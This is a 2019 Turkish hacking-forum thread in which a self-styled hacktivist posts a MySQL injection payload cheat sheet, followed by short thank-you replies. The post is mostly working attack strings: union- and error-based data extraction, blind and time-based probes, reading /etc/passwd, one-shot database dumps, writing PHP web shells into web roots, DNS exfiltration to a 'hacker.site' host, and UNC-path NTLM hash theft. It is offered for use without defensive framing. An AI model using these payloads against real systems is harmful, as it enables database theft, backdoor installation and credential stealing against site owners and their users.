Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: MySQL Enjeksiyon Payload Örnekleri
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
MySQL Enjeksiyon Payload Örnekleri
10.02.2019 15:03
# MySQL Enjeksiyon Payload Örnekleri
*********************************

Author : KingSkrupellos
Team : Cyberizm Digital Security Team

## MYSQL

Kod:
```sql
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MYSQL version 3.23.02
```

## Detect columns number

Kod:
Using a simple ORDER

```sql
order by 1
order by 2
order by 3
...
order by XXX
```

## MYSQL Union Based

Kod:
```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata​
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wH​eRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+​wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```

## MYSQL Error Based - Basic

Kod:
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```

## MYSQL Error Based - UpdateXML function

Kod:
```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
```

Shorter to read:

Kod:
```sql
' and updatexml(null,concat(0x0a,version()),null)-- -
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```

## MYSQL Error Based - Extractvalue function

Kod:
```sql
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```

## MYSQL Blind using a conditional statement

Kod:
TRUE: `if @@version starts with a 5`:

```sql
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
Response:
HTTP/1.1 500 Internal Server Error
```

False: `if @@version starts with a 4`:

```sql
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
Response:
HTTP/1.1 200 OK
```

## MYSQL Blind with MAKE_SET

Kod:
```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```

## MYSQL Blind with wildcard character

Kod:
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing

```sql
SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
```

## MYSQL Time Based

Kod:
```sql
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2

AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
```

## MYSQL Read content of a file

Kod:
```sql
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```

## MYSQL DIOS - Dump in One Shot

Kod:
```sql
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>[email protected]) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
```

## MYSQL DROP SHELL

Kod:
```sql
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
```

## MYSQL Out of band

Kod:
```powershell
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
```

DNS exfiltration

Kod:
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))​
```

UNC Path - NTLM hash stealing

Kod:
```sql
select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;
```
_________________________________________________

$$$$$$$$$ THE END $$$$$$$$
(Bu konu en son: 10.02.2019 Tarihinde, Saat: 15:04 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
#Ayar
*
avatar
Tabutçu
Durum: Çevrimdışı
Seviye Puanı: 35
Yaşam Puanı: 786 / 873
Deneyim: 95 / 100
Rep Sayısı: 1547
Mesaj Sayısı: 1860
Üyelik Tarihi: 13.08.2013
      
Yorum: #2
RE: MySQL Enjeksiyon Payload Örnekleri
11.02.2019 11:42
Teşekkürler, Emeğine Sağlık Smile

Başka forumlarda üyeliğim bulunmamaktadır.
ayar
Alinti
ehveniserbey
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 131 / 145
Deneyim: 82 / 100
Rep Sayısı: 1
Mesaj Sayısı: 63
Üyelik Tarihi: 07.02.2019
     
Yorum: #3
Cvp: MySQL Enjeksiyon Payload Örnekleri
11.02.2019 13:39
eline sağlık dostum
Alinti
byLanet
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 5
Yaşam Puanı: 42 / 114
Deneyim: 59 / 100
Rep Sayısı: 6
Mesaj Sayısı: 46
Üyelik Tarihi: 14.12.2018
     
Yorum: #4
RE: MySQL Enjeksiyon Payload Örnekleri
11.02.2019 15:01
Emeğe sağlık
(Bu konu en son: 11.02.2019 Tarihinde, Saat: 15:02 düzenlenmiştir. Düzenleyen: byLanet.)
Alinti
Lynx
*
avatar
Teğmen - Ex
Durum: Çevrimdışı
Seviye Puanı: 17
Yaşam Puanı: 215 / 423
Deneyim: 93 / 100
Rep Sayısı: 59
Mesaj Sayısı: 370
Üyelik Tarihi: 27.04.2017
     
Yorum: #5
RE: MySQL Enjeksiyon Payload Örnekleri
11.02.2019 16:43
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi